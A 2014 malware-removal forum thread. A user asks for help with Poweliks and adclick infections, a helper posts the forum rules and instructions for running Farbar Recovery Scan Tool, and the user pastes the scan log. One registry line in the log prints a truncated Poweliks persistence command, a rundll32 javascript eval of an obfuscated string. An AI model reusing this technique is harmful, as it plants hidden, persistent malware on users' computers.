Powershell Errors, powelik and adclick, dllhost.exe #?

danimal1969
New Helpee

Posts: 22

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 6:29:49 GMT -8

Post by danimal1969 on Oct 18, 2014 6:29:49 GMT -8

Wow, looks like this is more common that I thought. Seems I have it too. Computer is crazy slow, running hot (I'm guessing because the cpu is running at 100%). Norton is popping up that it has blocked Trojan.powelik and Trojan.adclick. I'm getting Powershell shutdown errors, and I see multiple dllhost.exe processes. Norton scan picks up nothing. Malwarebytes also picks up nothing.

Computer is HP laptop running windows 7 64 bit with SP1. Please help me too.

Thanks!
Dan

Last Edit: Oct 22, 2014 15:58:55 GMT -8 by Quads

dbrisen
Malware Removalists

Posts: 3,688

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 8:44:41 GMT -8

Post by dbrisen on Oct 18, 2014 8:44:41 GMT -8

Hi Dan! Welcome to the forum. My name here is dbrisen and either myself or Quads will be helping you with this problem. Before we get started there are some forum rules that we need to go over:

Do Not use advanced tools or any tools used on this board without supervision.

Malware removal can be difficult over a forum as it is, without a user doing their own actions, the tools used are more advanced and thus have added danger that comes with that. This board is protected so that only Malware removers, Admin and Mods can reply to a users thread but all members can create a thread asking for removal of Infection(s)

Make changes to your computer only when the Malware Expert specifically states it. The Malware Experts request specific steps to be followed, as some malware removal requires multiple steps and evaluations along the way. When you take other advice or make other changes, this often negates the work done by the expert, and can sometimes result in an inoperable system.

This also includes any tools or steps other than those the from the Malware Expert. We need to be certain about the state of your system to see what actually is going on, and what is required to fix the system while not harming the rest of the system. Most often, well-intentioned independent efforts can make things much worse. The malware remediation tools are more advanced than other tools, and can often create bigger problems when used without expert guidance.

Follow all the directions in order, and to the end. Please perform all steps in the order they are listed in each set of instructions. As you might imagine, some steps are a bit complicated. If things are not clear, be sure to stop and let the Malware Expert know the problem. We don't mind clarifying a situation, as others might have the same question. If a tool does not run as expected, don't force it. Stop the steps, and update the forum topic with the current situation. It is better stop and let us know, than to force a tool to run and cause bigger problems. Bottom line is, if you are not sure about something, STOP and ASK until you are sure.

Also, when your computer is clean and we are finished, the Expert will tell you we are finished. Malware removal is a process that requires verification, and we want to be sure your system is completely clean before we're done.

When describing your problem, provide as much information as possible, as soon as possible. Explain as best you can what happens with your computer, e.g. it beeps three times, black screen with cursor then goes no further, system gets stuck at the Windows startup logo, etc. This helps the expert to understand what is happening to the system and what may be wrong. If your computer cannot start up successfully please provide details about your installed Windows Operating System, including the Version, Edition and if it is a 32bit or a 64bit system. (e.g. Windows Vista Home Premium 32-bit)

When the user follow instructions and things still go a little haywire, and it does happen, it is up to us to sort the extra problem out.

Take longer to read if your language is not English, so that hopefully it is understood.

>>>>>> Reply stating you have read the post fully. <<<<<<<

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

danimal1969 New Helpee Posts: 22	Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 8:51:23 GMT -8 via mobile Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by danimal1969 on Oct 18, 2014 8:51:23 GMT -8 I have read the post fully and understand.

dbrisen
Malware Removalists

Posts: 3,688

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 10:06:32 GMT -8

Post by dbrisen on Oct 18, 2014 10:06:32 GMT -8

Read Slowly and all of it.

Please download www.bleepingcomputer.com/download/farbar-recovery-scan-tool/ You need to download the 64 bit version.

Place FRST64.exe onto your desktop from where ever it downloaded to. IF IT IS NOT ON THE DESKTOP (YOU DID NOT DOWNLOAD DIRECTLY TO DESKTOP), THEN RIGHT CLICK ON THE DOWNLOADED FILE AND SELECT CUT. FIND A BLANK SPOT ON YOUR DESKTOP AND RIGHT CLICK ON IT, SELECT PASTE AND THE FILE WILL BE ON THE DESKTOP. Thank You (this is very important later on)!

Start FRST64 that is on your Desktop

The tool will start to run.
When the tool opens click Yes to disclaimer. (if it does)
Press Scan button.

It will make two logs (FRST.txt and addition.txt) on your Desktop. Please attach the logs in your reply back. Or open the logs in notepad and copy the logs and paste back in a message as a reply. (Ask if you don't know how to do either of these). Note: The forum does not allow the Addition.txt file to be attached (for now) so use wikisend.com and post the link to the file instead. Thanks.

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

danimal1969
New Helpee

Posts: 22

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 10:45:24 GMT -8

Post by danimal1969 on Oct 18, 2014 10:45:24 GMT -8

Had to d/l farbar on another computer (on a flash drive) and transfer to this one. I disabled Norton because it was not allowing farbar to stay.

Ran farbar. Log:

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 18-10-2014 01
Ran by Dan (administrator) on HP-G72-DAN on 18-10-2014 15:12:51
Running from C:\Users\Dan\Desktop
Loaded Profile: Dan (Available profiles: Dan)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(CinemaNow, Inc.) C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemaNowSvc.exe
() C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft\BingBar\SeaPort.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3520 series\Bin\ScanToPCActivationApp.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Audible, Inc.) C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Dropbox, Inc.) C:\Users\Dan\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Hewlett-Packard Co.) C:\Program Files\HP\HP Deskjet 3520 series\Bin\HPNetworkCommunicator.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\n360.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Health Check\HPHC_Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe
(Realtek Semiconductor Corp.) C:\Program Files\Realtek\RtVOsd\RtVOsd.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Hewlett-Packard Development Company L.P.) C:\Program Files (x86)\Hewlett-Packard\Shared\hpCaslNotification.exe
(Microsoft Corporation) C:\Windows\System32\MsSpellCheckingFacility.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\wbem\WMIADAP.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2095400 2010-04-15] (Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6234144 2010-03-13] (Realtek Semiconductor)
HKLM\...\Run: [HPWirelessAssistant] => C:\Program Files\Hewlett-Packard\HP Wireless Assistant\HPWA_Main.exe [363064 2010-06-18] (Hewlett-Packard Company)
HKLM\...\Run: [IntelliPoint] => C:\Program Files\Microsoft IntelliPoint\ipoint.exe [2320752 2009-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284696 2010-04-13] (Intel Corporation)
HKLM-x32\...\Run: [Microsoft Default Manager] => C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [288088 2009-11-11] (Microsoft Corporation)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [602680 2010-07-02] (Hewlett-Packard Company)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-01-28] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2012-10-25] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-02-20] (Apple Inc.)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\Run: [HP Deskjet 3520 series (NET)] => C:\Program Files\HP\HP Deskjet 3520 series\Bin\ScanToPCActivationApp.exe [2551656 2012-01-31] (Hewlett-Packard Co.)
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: {beef630b-2661-11e4-8ab5-fae39741fd93} - G:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: {c0897274-3caf-11e1-851e-e9719a0a1c8d} - G:\LaunchU3.exe -a
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Audible Download Manager.lnk
ShortcutTarget: Audible Download Manager.lnk -> C:\Program Files (x86)\Audible\Bin\AudibleDownloadHelper.exe (Audible, Inc.)
Startup: C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Dan\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)
ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = www.msn.com/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0x577A5027A3ECCE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-US
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = www.comcast.net/
SearchScopes: HKLM - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM - {C6533ACD-D0A7-4CF9-A492-323D09D8C0C1} URL = search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM - {CC77866D-83CC-476D-8B37-2891DEBF635B} URL = www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM - {D80DE8EC-0CAB-4066-A108-2DB20A43AC78} URL = en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 - DefaultScope value is missing.
SearchScopes: HKLM-x32 - {C6533ACD-D0A7-4CF9-A492-323D09D8C0C1} URL = search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPNTDF
SearchScopes: HKLM-x32 - {CC77866D-83CC-476D-8B37-2891DEBF635B} URL = www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKCU - DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKCU - {CC77866D-83CC-476D-8B37-2891DEBF635B} URL =
SearchScopes: HKCU - {D80DE8EC-0CAB-4066-A108-2DB20A43AC78} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Toolbar: HKLM-x32 - Bing Bar - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files (x86)\Microsoft\BingBar\BingExt.dll (Microsoft Corporation.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76

FireFox:
========
FF ProfilePath: C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_224.dll ()
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_224.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
FF Plugin-x32: @apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=1.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin6.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin7.dll (Apple Inc.)
FF Extension: DownloadHelper - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-09-05]
FF Extension: ImageHost Grabber - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\{E4091D66-127C-11DB-903A-DE80D2EFDFE8} [2014-02-08]
FF Extension: DownThemAll! AntiContainer - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\anticontainer@downthemall.net.xpi [2014-02-08]
FF Extension: flv movies downloader - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\flvmoviesdownloader@rzll.xpi [2014-02-08]
FF Extension: Imgur Uploader - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\giorgio@gilestro.tk.xpi [2014-02-08]
FF Extension: FlashGot - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2014-02-08]
FF Extension: DownThemAll! - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\{DDC359D1-844A-42a7-9AA1-88A850A938A8}.xpi [2014-02-08]
FF Extension: Menu Editor - C:\Users\Dan\AppData\Roaming\Mozilla\Firefox\Profiles\eslc864v.default-1385756225182\Extensions\{EDA7B1D7-F793-4e03-B074-E6F303317FB0}.xpi [2014-02-08]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-18]

Chrome:
=======
CHR Profile: C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Norton Identity Protection) - C:\Users\Dan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-02-12]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-05]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-05]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 HP Health Check Service; C:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [121344 2010-06-30] (Hewlett-Packard Company) [File not signed]
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe [27192 2010-07-02] ()
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe [265040 2014-09-22] (Symantec Corporation)
R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation)
R2 RtVOsdService; C:\Program Files\Realtek\RtVOsd\RtVOsdService.exe [315392 2010-06-17] (Realtek Semiconductor Corp.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141003.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141017.001\IDSvia64.sys [633560 2014-08-31] (Symantec Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141017.018\ENG64.SYS [129752 2014-08-25] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141017.018\EX64.SYS [2137304 2014-08-25] (Symantec Corporation)
R3 RSUSBSTOR; C:\Windows\SysWOW64\Drivers\RtsUStor.sys [225280 2009-09-22] (Realtek Semiconductor Corp.)
R3 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-29] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-08-25] (Symantec Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-18 15:12 - 2014-10-18 15:14 - 00021972 _____ () C:\Users\Dan\Desktop\FRST.txt
2014-10-18 15:12 - 2014-10-18 15:13 - 00000000 ____D () C:\FRST
2014-10-18 15:11 - 2014-10-18 15:06 - 02112000 _____ (Farbar) C:\Users\Dan\Desktop\FRST64.exe
2014-10-16 22:42 - 2014-10-06 22:54 - 00378552 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-10-16 22:42 - 2014-10-06 22:04 - 00331448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-10-16 22:42 - 2014-09-28 20:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
